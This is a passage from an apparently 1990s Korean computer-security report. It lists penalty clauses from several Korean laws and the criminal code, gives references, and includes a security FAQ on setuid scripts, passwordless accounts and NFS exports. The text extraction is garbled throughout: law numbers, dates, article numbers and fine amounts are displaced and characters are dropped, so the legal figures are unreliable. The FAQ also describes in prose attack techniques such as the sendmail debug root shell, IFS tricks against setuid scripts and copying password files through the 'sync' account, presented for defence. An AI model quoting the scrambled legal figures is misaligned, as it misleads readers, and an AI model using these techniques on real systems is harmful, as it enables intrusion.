전기통신 사업법은 전기통신사업의 운영을 적정하게 하여 전기통신 사업의 건전한 발전을
기하고 이용자의 편의를 도모함으로써 공공복리의 증진에 이바지함을 목적으로 넌 월1991 8
일 법률 제 로 전문개정 하였다 표 참조10 4394 (< 5-6> .)
표 전기통신 사업법 중 벌칙 조문< 5-6>
처벌 조항 처벌 내용제 조 벌칙70 다음 각 호의 에 해당하는 자는1 년 이하의 징역 또는 천만원 이하3 1
의 벌금에 처한다.제 조 제 항의 규정 통신비 의 보호 에 위반하여 전기통신사업자4. 54 2 ( )가 취급 중에 있는 통신의 비 을 침해하거나 누설한 자.
제 절 전산망 보급확장과 이용촉진에 관한 법률7
전산망 보급확장과 이용촉진에 관한 법률은 전산망의 개발보급과 이용 등을 촉진하고 전산
망의 안정적 관리 운영을 통하여 정보사회의 기반을 조성함으로써 국민생활의 향상과 공공・복리의 증진에 이바지함을 목적으로 년 월 일 법률 제 호로 제정되었다 표1986 5 12 3848 (<
참조5-7> .)
표 전산망 보급확장과 이용촉진에 관한 법률 중 벌칙조문< 5-7>
처벌 조항 처벌 내용제 조 벌칙29 제 조 벌칙30 제 조의 벌칙30 2제 조의 벌칙30 4
제 조 제 항의 규정 비 등의 보호 을 위반하여 전자문서를 위작25 2 ( )① ・변작하거나 그 사정을 알면서 위작 변작된 전자문서를 행사한 자는・년 이하의 징역 또는 억원 이하의 벌금에 처한다10 1 .
제 조 제 항의 규정 비 등의 보호 을 위반하여 타인의 정보를 훼손하25 1 ( )거나 비 을 침해 도용 또는 누설한 자는・ 년 이하의 징역 또는 천만5 5원 이하의 벌금에 처한다.
제 조 제 항의 규정 전산망의 안전성 등 에 위반하여 전산망의 보호조22 2 ( )치를 침해 또는 훼손한 자는 년 이하의 징역 또는 천만원 이하의 벌3 3금에 처한다.
제 조의 의 규정 전자문서 등의 공개제한 을 위반하여 전자문서 또는17 5 ( )전자계산조직에 입력되어 있는 기록을 공개한 전산망관리자는 천만원1이하의 벌금에 처한다.
제 절 전파법8
전파법은 전파의 효율적인 이용 및 관리에 관한 사항을 정하여 전파 이용 및 전파에 관한
기술의 개발을 촉진함으로써 전파의 진흥을 도모하고 공공복리의 증진에 이바지함을 목적,
으로 년 월 일에 법률 제 호로 제정되었다 표 참조1961 12 30 924 (< 5-8> .)
표 전파법 중 벌칙 조문< 5-8>
처벌 조항 처벌 내용제 조 벌칙81 제 조의 규정 비 의 보호 에 위반한 자는42 ( )① 년 이하의 징역 또는1
만원 이하의 벌금에 처한다300 .무선통신업무에 종사하는 자가 제 항의 죄를 범한 때에는1② 년 이하의2징역 또는 만원 이하의 벌금에 처한다500 .
제 절 주민등록법9
주민등록법은 시 서울특별시 광역시를 제외한다 군 또는 구 자치구를 말한다 이하 같다( , ), ( , )
의 주민을 등록하게 함으로써 주민의 거주관계를 파악하고 상시로 인구의 동태를 명확히 하
여 행정사무의 적정하고 간소한 처리를 도모함을 목적으로 년 월 일 법률 제 호1962 5 10 1076
로 제정되었다 표 참조(< 5-9> .)
표 주민등록법 중 벌칙 조문< 5-9>
처벌 조항 처벌 내용제 조 벌칙21 다음 각 호의 에 해당하는 자는1② 년 이하의 징역 또는 만원 이3 300
하의 벌금에 처한다.제 조 제 항 또는 제 항의 규정 주민등록 주민등록표 파일보유5. 18 2 3 ( ,기관 등의 의무 에 위반한 자) .
제 절 화물유통촉진법10
화물유통촉진법은 물류의 표준화 정보화와 복합운송주선업 화물터미널사업 및 창고업 등에, ,
관한 사항을 규정하여 물류체계를 합리화하고 화물의 유통과 관련된 사업의 건전한 발전을
도모함으로써 화물유통의 촉진과 물류비의 절감에 의하여 국민경제의 발전에 이바지함을 목
적으로 년 월 일 법률 제 호로 제정되었다 표 참조1991 12 14 4433 (< 5-10> .)
표 화물유통촉진법중 정보보호관련 벌칙 조문< 5-10>
처벌 조항 처벌 내용제 조의 벌칙54 2 제 조의 벌칙54 3 제 조의 벌칙54 4 제 조의 벌칙55 2
제 조의 제 항의 규정 전자문서 및 물류정보의 보안 에 위반하여 물48 7 1 ( )①류전산망에 의한 전자문서를 위작 또는 변작하거나 그 사정을 알면서 위작 또는 변작된 전자문서를 행사한 자는 년이하의 징역 또10는 억원이하의 벌금1 에 처한다.
제 조의 제 항의 규정 전자문서 및 물류정보의 보안 에 위반하여 물류48 7 2 ( )전산망에 의하여 처리보관 또는 전송되는 물류정보를 훼손하거나 그 비.을 침해 도용 또는 누설한 자는・ 년이하의 징역 또는 천만원이하5 5
의 벌금에 처한다.
제 조의 제 항의 규정 전자문서 및 물류정보의 보안 에 위반하여 물류48 7 5 ( )전산망의 보호조치를 침해하거나 훼손한 자는 년이하의 징역 또는3 3천만원이하의 벌금에 처한다.
제 조의 의 규정 전자문서 및 물류정보의 보안 에 위반하여 전자문서48 8 ( )또는 물류정보를 공개한 자는 천만원이하의 벌금1 에 처한다.
제 절 형법11
형법은 년 월 일 법률 제 호로 제정되어 년 월 일에는 날로 지능화 고1953 9 18 293 , 1995 12 29 ・도화되어 가는 각종 컴퓨터범죄에 대처하는 처벌 조항을 신설하여 법률 제 호를 개정하5057
여 년 월 일부터 시행되고 있다 표 참조1996 7 1 (< 5-11> .)
표 형법중 정보보호 관련 벌칙 및 조문< 5-11>
처벌 조항 처벌 내용제 조 공무상140비 표시무효 제 조의 공전227 2자기록위작 변작・제 조 공정증서228원본등의 부실기재제 조의 컴퓨347 2터등 사용 사기 제 조 위조등229공문서의 행사
공무원이 그 직무에 관하여 보함 기타 비 장치한 문서 또는 도화를②개봉한 자는 년이하의 징역 또는 만원이하의 벌금5 700 에 처한다.공무원이 그 직무에 관하여 봉함 기타 비 장치한 문서 도화 또는,③전자기록등 특수매체기록을 기술적 수단을 이용하여 그 내용을 알아낸 자는 년이하의 징역 또는 만원이하의 벌금5 700 에 처한다.
서무처리를 그르치게 할 목적으로 공무원 또는 공무소의 전자기록등 특수매체기록을 위작 또는 변작한 자는 년이하의 징역10 에 처한다.
공무원에 대하여 허위신고를 하여 공정증서 원본 또는 이와 동일한 전자기록등 특수매체기록에 불실의 사실을 기재 또는 기록하게 한자는 5년이하의 징역 또는 만원이하의 벌금1000 에 처한다.
컴퓨터등 정보처리장치에 허위의 정보 또는 부정한 명령을 입력하여 정보처리를 하게 함으로써 재산상의 이익을 취득하거나 제 자로 하여금3취득하게 한 자는 년이하의 징역 또는 천만원이하의 벌금10 2 에 처한다.
제 조 내지 제 조의 죄에 의하여 만들어진 문서 도화 전자기록등225 228 , ,특수매체기록 공정증서원본 면허증 허가증 등록증 또는 여권을 행사, , , ,한 자는 그 각죄에 정한 형에 처한다. 제 조의 공전자기록 위조( 227 2( ・변조 에 의해 년이하의 징역에 처한다) 10 )
처벌 조항 처벌 조문 및 벌칙제 조의 사전232 2자기록 위작 변・작
제 조 위조사문234서 등의 행사 제 조의 업무314 2방해 제 조 비 침해316 제 조 권리행사323방해
사무처리를 그르치게 할 목적으로 권리 의무 또는 사실증명에 관한 타,인의 전자기록등 특수매체기록을 위작 또는 변작한 자는 년이하의 징5역 또는 만원이하의 벌금1000 에 처한다.
제 조내지 제 조의 죄에 의하여 만들어진 문서 도화 또는 전자기231 233 ,록등 특수매체기록을 행사한 자는 각 죄에 정한 형에 처한다 제 조.( 232의 사전자기록 위작 변작2( )・ 년이하의 징역 또는 천만원이하의 벌5 1금)
컴퓨터등 정보처리장치 또는 전자기록등 특수매체기록을 손괴하거나②정보처리장치에 허위의 정보 또는 부정한 명령을 입력하거나 기타 방법으로 정보처리에 장애를 발생하게 하여 사람의 업무를 방해한 자는 5년이하의 징역 또는 천 만원이하의 벌금1 500 에 처한다.
봉함 기타 비 장치한 사람의 편지 문서 또는 도화를 개봉한 자는,① 3년이하의 징역이나 금고 또는 만원이하의 벌금500 에 처한다.봉함 기타 비 장치한 사람의 편지 문서 또는 전자기록등 특수매체,②기록을 기술적 수단을 이용하여 그 내용을 알아낸 자도 제 항의 형과1같다.
타인의 점유 또는 권리의 목적이 된 자기의 물건 또는 전자기록등 특수매체기록을 취득 은닉 또는 손괴하여 타인의 권리행사를 방해한자는, 5년이하의 징역 또는 만원이하의 벌금700 에 처한다.
제 절 통신비 보호법12
통신비 보호법은 통신 및 대화의 비 과 자유에 대한 제한은 그 대상을 한정하고 엄격한
법적 절차를 거치도록 함으로써 통신비 을 보호하고 통신의 자유를 신장함을 목적으로
년 월 일 법률 제 호로 제정되었다 표 참조1993 12 27 4650 (< 5-12> .)
표 통신비 보호법중 정보보호관련 법률 조문< 5-12>
정보보호 관련조항
조문 내용
제 조 통신 및 대3화비 의 보호
누구든지 이 법과 형사소송법 또는 군사법원법의 규정에 의하지 아니하고는 우편물의 검열 또는 전기통신의 감청을 하거나 공개되지 아니한타인간의 대화를 녹음 또는 청취하지 못한다 예외 생략( ).
참고 문헌
이재우 외 인터넷 유닉스 관리자를 위한 보안기술 지침서 한국전산원[1] , / , , 1995.
노정석 김휘강 조용상 최재철 해킹의 최신 형태와 방지 테크닉 월간인터넷[2] , , , , “ ”, , 1996.
이석찬 개인 자료[3] , "Hackers and His Attacks", , 1995.
이석찬 외 인터넷 침입 수법과 대응 방안 특강 자료집[4] , “ ”, NETSEC-KR96 , KUS,
PLUS, 1995.
임채호 외 관리자를 위한 인터네트 보안지침서 시스템공학연구소[5] , Version 1.4, , 1995.
김진식 김희상 장환용 김영민 해커들의 해킹기법 연암출판사[6] , , , , , , 1993.
오영희 외[7] , Security+ for UNIX, PLUS, 1995.
이서로 외 파워 해킹 테크닉 파워북[8] , , , 1995.
나이트메어 슈퍼해커의 해킹 비 연암출판사[9] , , , 1995.
서삼영 외 주전산기 용 보안유틸리티 개발보고서[10] , , 1993.Ⅰ
이재우 외 정보화 역기능 현황 및 분석 한국전산원[11] , , 1995.
임채호 해킹 수법 현황 및 방지 대책 정보보호심포지움[12] , “ ”, ‘96 1996.
[13] RAND, "Emerging Challenge: Security and Safety in Cyberspace", IEEE Technology
and Society Magazine, Vol.14 No.4., 1996.
[14] Marcus J. Ranum, A Taxonomy of Internet Attacks : What You Can Expect, IWI,
1995.
[15] Simson Garfinkel and Gene Spafford, Practical Internet and UNIX Security*,
O*Reilly & Association, 1996.
[16] Danny Smith, "Forming Incident Response Team", AUSCERT, 1995.
[17] CERT-Advisory Series, CERT.
[18] http://8lgm.org, 8lgm Security Advisories.
[19] http://www.first.org
[20] http://www.cert.org
[21] http://www.cert-kr.or.kr
[22] http://www.auscert.org.au
[23] http://www.cert.dfn.de/eng
[24] http://www.nic.surfnet.nl/surfnet/security/cert-nl.html
[25] Proc. of '96 FIRST Conference proceeding, 1996.
전산망 정보보호 질의 응답
(Security - Frequently Asked Questions)
해커 와 크래커 의 차이는Q.1 (Hacker) (Cracker) ?
유즈넷 에서 누군가를 침입자 라고 부르는 것은 그 사람이 어떤 특별한 이유로(USENET) , “ ”
지속적으로 다른 사람의 시스템에 침입하고자 시도한다는 것을 분명하게 지칭한다 그 사람.
은 그렇게 하는 이유에 대해 그 시스템이 워낙 손쉽게 들어갈 수 있는 환경이었으므로 등의
변명을 댈지도 모르나 대부분의 경우 금지된 불법적인 일을 한다는 자기 만족을 위해서이, /
다.
특히 반사회적 침입자들은 반달족 침략하여 예술문화를 파괴함 의 기질을 가지며 그들의( . ) ,
공격을 통해 파일을 지우거나 기계를 파괴하고 실행중인 프로세스를 파괴한다 이러한 개, , .
념은 또한 컴퓨터의 응용프로그램 소프트웨어의 무료 사본을 배포하거나 보유하기 위해 복
제 보호를 해제하는 사람들을 지칭하기 위해 폭넓게 사용되기도 한다.
유즈넷에서 누군가를 해커 라고 부르는 것은 그 사람이 컴퓨터 분야에 관해 많은 지식과, “ ”
경험을 가지고 있으며 이 경험들을 매우 정교하게 활용할 수 있음을 말한다 그러나 실제의, .
경우 많은 언론인들이 해커 라는 용어를 침입자 를 의미하도록 사용하였으며 이러한 사, “ ” “ ” ,
용법은 유즈넷에서도 가끔씩 나타나 혼돈을 일으키기도 하였다.
뉴스 그룹에 기사를 작성하는 사람중 크랙커 라는 용어 대신에 해커 라는 용어를 사용하“ ” “ ”
는 경우 매우 중대한 비난전쟁 에 휘말리는 것을 감수하여야 한다는 점에 유, (Frame War)
의하여야 한다.
은폐를 통한 보안 이란Q.2 " (Security through Obscurity)" ?
은폐를 통한 보안 이란 시스템을 구축한 사람들 이외에 외부인들이 시스템의 내부 구(STO)
조에 대해 어떠한 것도 알아낼 수 없도록 하면 어떠한 시스템도 안전할 수 있다는 믿음을
말한다 어느 누구도 찾아낼 수 없으리라 는 가정하에 계정의 패스워드를 이진 파일이나. “ ”
스크립트에 두는 것등은 의 주된 예로서 는 관료적인 사람들에 의해 선호되어 왔STO , STO
으며 컴퓨터 시스템에서 기본적인 보안의 개념으로 사용되었다, .
개발시스템 네트워킹의 발전 그리고 프로그래밍 기법에 대한 보다 깊은 이해의 증가와 일,
반인들에게 제공된 컴퓨터 능력의 증가와 함께 이러한 개념의 유용성은 감소되었는데, STO
의 기반은 시스템을 언제나 알 필요 에 근거하여 운영한다는 데 있다 만“ (Need to Know)" .
약 어떤 사람이 시스템 보안을 위태롭게 하는 방법을 모른다면 그 시스템은 안전하다.
이것이 이론상으로는 명백히 옳지만 만약 당신의 피고용인이 다른 곳으로부터 보다 좋은,
급여를 제의 받는다면 지식은 그들과 함께 옮겨가게 된다 비 이 새어나가게 되면 당신의.
보안은 거기서 끝나게 되는 것이다.
오늘날은 그 어느 때에 비해서도 일반적인 사용자들이 시스템이 어떻게 작동하는지를 알아
야 할 필요성이 커졌으며 결과적으로 는 쇠퇴하였다 오늘날의 많은 사용자들은 그들, STO .
의 운영체제가 어떻게 작용하는지에 대해 진보된 지식을 가지고 있으며 그들이 알 필요, “ ”
가 없는 지식에 대한 부분도 예측할 수 있는 충분한 경험을 가지고 있다 이것은 를 전. STO
체적으로 건너뛰어 당신의 보안을 무용지물로 만들어 버린다.
따라서 현재에는 단지 개념적으로 안전한 시스템이 아닌 알고리즘적으로 안전한 예“ ” “ ( :
시스템을 구축할 필요가 있다 이러한 시스템의 초기 조건이 맞는Kerberos, Secure RPC)" .
다면 당신의 시스템은 논리적으로 안전하다.
흔히 새도우 패스워드 아래 참조 를 로 속단하지만 실상은 옳지“ (Shadow Password)"( ) STO
않다 왜냐하면 는 알고리즘 또는 기술에의 접근을 차단하는 것에 의존하지만 새도우. , STO
패스워드는 실제 데이터에의 접근을 차단하는 방법으로 보안을 제공하기 때문이다.
무엇이 시스템을 불안하게 하는가Q.3 ?
진짜로 안전한 유일한 시스템은 스위치가 꺼져있고 전원선이 뽑혀 있으며 티타늄의 금고“ , ,
에 잠겨져 콘크리트 벙커에 묻힌채 신경가스와 높은 보수를 받는 경비원들에 의해 둘러 싸, ,
여 있는 시스템이다 그렇다고 해도 나는 여기에 목숨을 걸 정도로 안심하지 않겠다. .”
의 저자인(Practical UNIX & Internet Security Gene spafford)
시스템의 안전성은 거기에 접근할 수 있는 사용자의 안전성을 넘지 못한다 시스템은 거기.
에 접근할 수 있는 사용자 모두가 책임을 가지고 있다는 가정하에 지속적인 시스템의 정상
운영이 그들 모두에게 중요하더라도 하드웨어의 고장에 대비한 정기적인 백업이 수행된다면
전혀 보호하지 않더라도 완벽하게 안전할 수도 있다 많은 연구실 내의 들이 이같이“ ” . PC
취급되고 있다.
보안 허점들은 크게 보아 다음의 네가지 유형으로 나타난다.
물리적 보안 허점1)
인가되지 않은 사람들이 물리적으로 시스템에 접근하도록 허가되었을 때 그들이 수행할 수,
없는 작업을 수행할 수 있도록 허용될 수 있다 이에 대한 좋은 예로 개인이 쉽게 시스템을.
단일 사용자 모드로 재시동시켜 워크스테이션 파일 시스템을 검색하고 다닐 수 있다 다른.
예로 개인자료에 대한 일반 사용자들의 접근이 허가가 되었든 아니든 이들이 테이프 및 테,
이프 드라이브에 접근할 수 있을 때 기 자료가 있는 백업 테이프에 대한 접근을 통제할,
필요가 발생한다.
소프트웨어 보안 허점2)
수행하지 말아야 할 작업들을 수행하도록 조정될 수 있는 식의 잘못된 특권을 가진 소프“ ”
트웨어들 들 들 에 의해 문제가 발생되는 경우로서 가장 널리 알려진 예는(daemon , cronjob ) ,
로서 침입자가 쉘을 사용할 수 있도록 한다 이를 통해 파일을 삭제“sendmail debug" ”root" .
하거나 새로운 계정을 작성하거나 패스워드 파일을 복사하는 등 어떠한 일도 할 수 있다, , , .
일반적인 견해에 반하여 을 통한 공격은 저 유명한 인터넷웜에 국한된 것이 아- , sendmail
니다 어떠한 침입자도 대상 기계의 번 포트에 을 통하여 같은 일을 할 수 있는데- 25 telnet ,
새로운 허점들은 계속하여 나타나고 있으며 할 수 있는 최선책은,
가능한 최소한의 소프트웨어들이 의 권한을 갖고 수행되고 이들이 모a. root, daemon, bin ,
두 견실하도록 시스템을 구축하는데 노력하여야 한다.
가능한 한 빠른 시기에 문제에 대한 세부사항과 수정사항을 당신에게 공급해줄 전자우편b.
그룹 에 가입하고 정보를 받게 되면 즉시 실행한다(Mailing List) , .
어떤 시스템을 설치 업그레이드하는 경우 바로 필요로 하거나 필요가 예측되는 소프트웨c. / ,
어 패키지만을 설치 실행시킨다 많은 패키지들이 정보를 외부로 드러낼 수 있는/ . daemon
또는 유틸리티들을 포함하고 있다 예를 들어 의 계정관리 패키지. , AT&T System V Unix
는 을 포함하는데 이는 디폴트로 어떤 사용자라도 다른(Accounting Package) acctcom(1) , ( )
사용자 메일의 계정 자료를 검토할 수 있게 되어 있다.
많은 패키지들이 및 등의 프로그램을 설치 실행시키는데 이들TCP/IP rwhod, fingerd, tftpd /
모두가 보안상의 문제를 보일 수 있는 것들이다 해결책은 시스템 관리자의 주의로서 이들.
프로그램중 대부분은 시동시 초기화되어 동작하므로 원할 경우 시동 스크립트 보통( /etc,
디렉토리에 있음 을 수정하여 그들의 수행을 막을 수 있다/etc/re/, /etc/rcXd ) .
또는 일부 유틸리티들을 완전히 제거시킬 수도 있다 일부 유틸리티들에 대해서는 단순히. ,
만으로도 인가되지 않은 사용자들의 접근을 방지할 수 있다 요약해서 말하자면chmod(1) . ,
설치 스크립트 프로그램을 신뢰하지 않도록 한다 그러한 것들은 당신의 확인을 받지 않고/ .
패키지 내의 모든 것들을 설치 실행하는 경향이 있다/ .
호환되지 않는 사용에 의한 보안 허점3)
경험의 부족으로 인해 또는 자신의 고의는 아니지만 시스템 관리자가 보안상 심각한 결점,
이 있는 하드웨어와 소프트웨어를 함께 조합하여 구성할 수 있다 보안 허점은 상호간에 관.
련이 없는 유용한 작업을 그러나 호환되지 않는 두 가지 작업을 수행하려고 하는데서 발생
될 수 있다 이와 같은 문제들은 시스템이 구성되어 수행된 후에 발견되면 문제가 매우 크.
므로 시스템을 구축할 때 미리 염두에 두는 편이 좋다
적절한 보안 관념 및 이의 유지4)
네 번째의 보안 문제는 인식과 이해의 문제이다 완벽한 소프트웨어 보호된 하드웨어 그리. , ,
고 호환되는 구성요소들도 당신이 적절한 보안 정책을 선택하고 이를 강제적으로 시행시키
는 당신의 시스템의 부분들을 실행시키지 않는다면 아무런 소용이 없다 세상에서 가장 훌.
륭한 패스워드 메카니즘을 가지고 있어도 당신의 사용자들이 로그인 이름을 역순으로 하여
패스워드 쓰면 가장 좋은 패스워드가 될 것이라고 믿고 있다면 가치가 없는 것이다 보안은.
정책과 이 정책을 준수하는 시스템의 작동과 관련되는 것이다.
침입을 위한 도구를 공개하는 것은 위험하지 않은가Q.4 ?
해석하기 나름이지만 어떤 이들은 나 같은 프로그램을 제한 없이 공개하는 것에COPS Crack
대하여 악의의 사용자들도 쉽게 얻을 수 있다는 점을 들어 불평한다 하지만 실제 악의의.
사용자들은 몇 년 동안 이미 이 같은 프로그램들을 가지고 있었을 것이다 오히려 선의의.
사용자들에게 이 프로그램을 널리 알려 악의의 사용자들이 프로그램을 얻기 전에 미리 시스
템의 문제점을 체크하는 것이 낫지 않을까 이 공개된 프로그램들을 가지고 누가이길 것인?
가 당신이 결정할 일이다 다만 기억할 것은 선의의 사용자들이 모르는 나 보? . COPS Crack
다 더욱 문제가 많은 도구들이 이미 널리 퍼져있다는 사실이다.
왜 그리고 어떻게 시스템이 침해되는가Q.5 , ?
왜 이를 명확하게 대답할순 없다(1) “ ?” - .
침입자들이 침입하는 많은 시스템들이 다른 시스템으로 우회할 입구로 악용된다 침입자1. (
들은 한 시스템을 깨기 전에 여러 시스템을 거쳐서 들어가기에 추적자를 혼란시키고 흔적을
남기지 않는다)
다른 이유로 심리적인 면을 들수 있다 어떤 이들은 컴퓨터를 즐기며 좋아하고 그들의 능2. .
력의 한계를 늘리려고 한다 몇 명의 침입자들은 실제 유명한 연구소나 회사.
를 들어가기 위해 대의 인터넷 기계 대의 게이트웨이 그리고(NASA,CERN,AT&T,UCB) 6 , 2
공중데이타망을 거친다X25 .
어떻게 대학내에서는 계정이 학생들 사이에서 서로 건네어지는 것을 일반적이다(2) “ ?” - .
이런 일은 대학 내에서만 일어나는 것이 아니다 교육을 통해 사용자들이 이런 태도를 갖지.
않도록 해야한다 어떤 학생들은 내 계정의 어떤 패스워드든지 프린터로 찍어 놓지요 라고. “ ”
말한다 그들에게 컴퓨터의 사용은 책임이 따른다는 것을 알려주어야 한다. .
내 시스템이 침해당했을 때 누구를 접촉해야 하는가Q.6 ?
당신이 인터넷에 연결되어 있다면 먼저 를 찾아라CERT .
는 년에 에 의해 설립되CERT 1988 DARPA(Defense Advanced Research Projects Agency)
어 인터넷 사용자들의 컴퓨터 보안 측면에서 핵심적인 위치로 서비스하고 있다 의. CERT
는 피츠버그의 내 에 위치하고Coordination Center PA, CMU Software Engineering Institute
있다.
전자우편 :[email protected]
시간 핫라인Tel : 412-868-7090 (24 )
의 개인적인 답변은 오전 분에서 오후 까지 는 현재 의 사CERT?CC 7:30 6:00 “NIST FIRST
무국 이다 우리는 의 정보목차를 가진 를 운영하고 있다(secretariat) ” FIRST anonymous ftp
의 이 목차에는 현재 멤버들과 기여자들 그리고 연락처 정보(csrc.ncsl.nist.gov /pub/first),
를 포함한 파일들이 있다 가 큰 조직인 반면 주로 사고를 처리하는 다른 대응팀들은. CERT ,
제한된 영역에서 인터넷 사용자들을 도울 것이다.
국내에서는 한국정보보호센터에 문의하는 것이 좋다 이 보고서에 한국의 침해사고 대응팀. “
에 대한 현황 이 소개되어 있지만 센터의 기술대응팀에 문의한다면 가장 적절한 조치와 함”
께 조언을 받을 수 있다.
Email : [email protected]
Tel : 02-398-0202
Fax : 02-398-0333, 398-0204
침입차단 시스템 방화벽 이란Q.7 ( , Firewall) ?
방화벽시스템 은 내부망과 외부망 사이에 위치하는 구성요소를 말한다 이는 통신(Firewall) .
트래픽에 대하여 제어가능한 필터링을 제공하고 몇 개의 정해진 인터넷 포트 즉 당신의 컴(
퓨터가 네트워크에 제공하는 모든 서비스들 에 제한된 접근을 허락하고 그 밖의 모든 것을)
막는다 인터넷의 연결이 늘어갈수록 점점 대중화되고 있다. .
쉘스크립트를 사용하지 말아야하는 이유는Q.8 setuid ?
대부분 유닉스 커널의 버그들이지만 여러 가지 이유로 사용하면 안된다 잘 알려진 문제들.
중 몇 개를 보면
만일 스크립트가 로 시작하고 링크가 이면 쉘스크립트는 대화형1) “#!/bin/sh" ”-i“ setuie
쉘인 이므로 쉘이 즉시 받아들여질 수 있다”!/bin/sh -i“ setuid .
많은 커널은 새로운 를 설정하는 된 프로세스가 시작된 후로부터 해석기2) setuid exec()
가 시작되기 전까지의 기간에 사용자가 당신이 선택한 다른 수행 가능한 쉘 스(Interpreter)
크립트로 바꿀 수 있다.
버그 쉘 변수는 명령어 이름을 파싱할 때 쉘에 의해서 사용되며 기본적으로3) IFS : IFS ,
공백 문자열을 포함한다 변수를 문자로 바꿈으로 명령어 는 가. IFS ‘’/“ ”/bin/true“ ”bin true“
된다 당신이 필요로 하는 것은 수정된 변수를 빼고 당신의 에 이라 불리는. IFS pathd "bin"
명령어를 설치하고 로 불리는 스크립트를 수행한다 그러면 은”bin/true“ setuid . ”bin“ setuid
가 수행된다.
만일 스크립트를 작성해야 한다면 다음과 같이 해야 한다setuid .
스크립트 주변의 내에 를 넣어라 스크립트를 하기 전에 민감한1) “C setuid wrapper . exec()
것에 대하여 와 를 재설정한다 만일 당신 시스템이 를 가진다면IFS PAJH . Runtime Lib
또한 고려해라LD_LIBRARY_PATH .
안전한 기능을 위해서는 같은 언어로 스크립트를 짜라2) setuid perl .
어떻든 스크립트는 안전하지 못하다setuid .
왜 를 콘솔에서 오래동안 로그온 해두어서는 않되는가Q.9 root ?
콘솔 터미널을 사용하고 로 접속한 상태에서 에 쓰기 가능케 만드‘smart' ’root‘ ’/dev/console‘
는 것은 잠재적인 문제가 있다 터미널은 를 통하여 원격제어를 하는 것에. escape sequence
다소 취약점을 가지고 있고 쉘로 무엇인가 입력하는 것이 가능하다 터미널의 형식은root . ’
명령으로 알 수 있다 이것에 대한 다양한 해결책을 모색해 볼 수 있는데 일반적으로 콘ps‘ .
솔 소유자와 에게만 접근 권한을 주고 그런 다음 콘솔에 출력을 보낼 필요가 있는 프group
로그램에서 체계를 이용하는 것이다setuid .
왜 패스워드 없는 계정을 만들어서는 않되는가Q.10 ?
어떤 목적이든 패스워드가 없는 계정을 만드는 것은 상당히 위험하다 특별한 이유가 있어.
서라기 보다는 침입자가 이용할 수 있는 거점을 제공할 수 있기 때문이다 예를 들어 대부.
분 시스템에서 패스워드 없는 계정인 를 발견할 수 있을 것이다 이는 시스템 관리자'sync' .
이 로그인 과정없이 디스크를 하는 것이다 이것은 안전하고 위험하지 않게(sysman) sync .
보일 수 있다 그러나 당신의 시스템이 에 접속하기 전에 사용자를 검사하지 않는 시스. FTP
템중의 하나라면 문제가 발생할 수 있다 침입자는 다양한 을 이용하여 접속할 수 있고FTP
패스워드가 없는 계정 를 이용해서 패스워드 파일을 복사해 갈 수도 있다 유닉스의“sync” .
최신 버전은 이런 종류의 사건을 미리 방지하는 기능을 갖고 있지만 완전하게 안전한 시스
템을 위해서는 시스템의 모든 패키지에 대하여 그리고 사용자 확인의 처리 방식에 대하여,
깊이 있는 지식을 가지고 있어야 한다.
가 가지고 있는 또 다른 문제점은 자신의 에 있는 변Null-passwd Lib LD_LIBRARY_PATH
수를 바꿔서 사용자를 바꾸는 또는 를 실행시킴으로서 자신의 프로그램을‘login -p' ’su‘
가 실행한 것처럼 시스템 프로그램을 속일 수 있는 가능성이 있다'sync' user (spoofing) .
윈도우와 관련된 보안상의 허점들은 어떤 것들인가Q.11 X- ?
일부는 에만 어떤 것들은 시스템 전체 보안에 영향을 미치기도 한다 자세한 것은 다른 뉴X .
스그룹 의 를 참조하고 한가지 지적하고 싶은 것은 는 비호환(comp.windows.*) FAQ X
보안에 문제를 가지고 있는 프로그램이라는 것이다 예를 들어 침입자(Incompatible Usage)
는 패스워드에 없는 계정을 가진 호스트들에 대하여 적절한 설정이 되어있지 않다면
을 실행할 가능성이 있다xsession .
와 관련된 보안상의 허점들은 어떤 것들인가Q.12 NFS ?
대부분 당신의 디스크를 누구에게 그리고 어떻게 하는가와 관계가 있다 의 보안Export .NFS
은 서버가 하는 파일들을 누가 마운트할 수 있는가 그리고 파일들이 읽기 전용으로Export
될 것인가 말 것인가에 크게 의존한다 어떤 호스트가 된 디렉토리를 마운트할Export . Export
것인가를 나타내는 정확한 포맷은 유닉스의 구현에 다라 다르나 일반적으로 그 정보는
파일내에 들어있다"/etc/export" .
이 파일은 디렉토리들의 리스트와 그 각각의 디렉토리를 마운트하도록 허용된 특정NFS
의 호스트들 또는 을 포함한다 이 리스트를 접근 목록 이라 부른다netgroups . (access list) .
호스트들은 개개의 기계인데 반해 은 호스트들과 에 명시된netgroup “etc/export” username
들의 조합이다 이러한 것들은 올바른 접근 방법을 제공하기 위함이다 에 대한 더. . netgroup
자세한 사항은 적절한 매뉴얼을 참고하기 바란다 파일은 또한 그 디렉토리가 읽기. Exports
전용으로 되었는가 읽기 쓰기로 되었는가 그리고 그 디렉토리를 마운트한 클Export , - Export ,
라이언트들로부터 접근이 허용될 것인가에 대한 정보를 담고 있다 어떤 디렉토super-user .
리에 대한 접근목록이 다음과 같은 내용을 에 포함할 때 고려해야할 중요한 점“etc/exports"
들이 있다.
아무것도 포함하지 않을 때1)
당신의 디렉토리는 아무에게나 그리고 어디에서든지 마운트될 수 있다.
특정 호스트이름을 포함할 때2)
당신의 디렉토리는 명시된 호스트이름에서 마운트 명령을 수행할 수 있는 사람에 의해 마운
트 될 수 있다 이 사람은 아마 믿을 수 없는 사람일 수도 있다 예를 들면 만약 기계가. . ,
를 수행하는 라면 마운트할 수 있는 사람은 모든 사람이 될 수도 있다NFS PC
이름을 포함할 경우3) netgroup
만약 이netgroup
비어있을 경우 당신의 디렉토리를 어느 누구나 어디에서나 마운트할 수 있다a) , .
을 포함한 경우 디렉토리를 어느 누구나 어디에서나 마운트할 수 있다b)"(,,)" .
빈 의 이름을 포함하거나 을 포함한 경우 당신의 디렉토리를 어느 누구나c) netgroup "(,,)"
어디에서나 마운트할 수 있다.
을 포함한 경우 명시된 호스트에서 파일을 하도록 허락된 어느 누d) "(hostname,,)" mount
구도 당신의 디렉토리를 할 수 있다mount .
을 포함한 경우 어디서든 의 는 당신의 디렉토리를 마운트할e) "(,username,)" username user
수 있다.
도 아니고 도 아닌 경우4) hostname netgroup
디렉토리를 호스트 로 하려 하는데 실제로 로 쳤을 경우 는“athena” export “athena" athena
이름으로 받아들여져서 비어있는 으로 된다 그래서 그 디레토리를 어느netgroup netgroup .
누구나 어디에서나 마운트할 수 있다 그래서 와 에 입력할 때 주의. /etc/export /etc/netgroup
하지 않게 되면 를 가진 사용자들이 다음과 같은 것을 하게되는 것을 발견할 것이다PC .
